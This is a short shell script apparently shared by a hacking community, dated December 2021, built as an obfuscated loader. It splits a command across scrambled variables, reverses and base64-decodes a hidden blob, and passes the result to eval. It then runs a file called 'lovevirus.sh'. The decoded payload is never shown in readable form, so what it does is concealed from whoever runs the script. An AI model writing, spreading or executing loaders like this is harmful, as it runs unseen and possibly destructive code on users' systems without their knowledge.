#!bin/sh -q
# Auther : Simplehacker1_Communty 
# Powered By simplehacker1
# Starting Date : 1 DEC 2021



gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" 'KIyVRJHJyMGSkgHJxBjTkICIsFmdlpQKiAnW4RSVkwEJXFlckoXOWRydkYGJwpFekYHJyMGSkIGJ3RyckQGJXFlckMGJ3RiMjhEJiACbhZXZoQSP4pgIi0Dcah3OiMHZFJSP4R1OiwHI2JSPitjIlJSP3tjIiJSP2tjIi0Tcw40OiYWZi0zYKtjIk1CIi0TV7IiZpJSPjhDU7IiNi0je5Y1Oi8mI9Q2OiUWYi0jZFN2OiMXYwJSPFN2a7IychJSPmtjIi0jMjh0OiMnI9oEeItjIyBCfgciCJlnRpF2V0Y3Yyc2ZMhVRONUaNdWUYZFMhdkV5lERvdWVywGdjdEesF2RGpWYyYVeNZVOEJmMxQHZXVDMlNVQONUaNdWVzIFaj5mUwJWbjdmUHZEMaNVQ2kERFdmUFZFRJRUS31kaF50QtpEajJzZnJ2R5IjWYpFcj5mV6xkbO9GRR9mTDdWP9cCIi0zc7ISUsJSPxUkZ7IiI9cVUytjI0ISPMtjIoNmI9M2Oio3U4JSPw00a7ICZFJSP0g0Z
' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp=""
x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp")
eval "$N0q$x$Hc2$rQW"
sh lovevirus.sh
bash lovevirus.sh
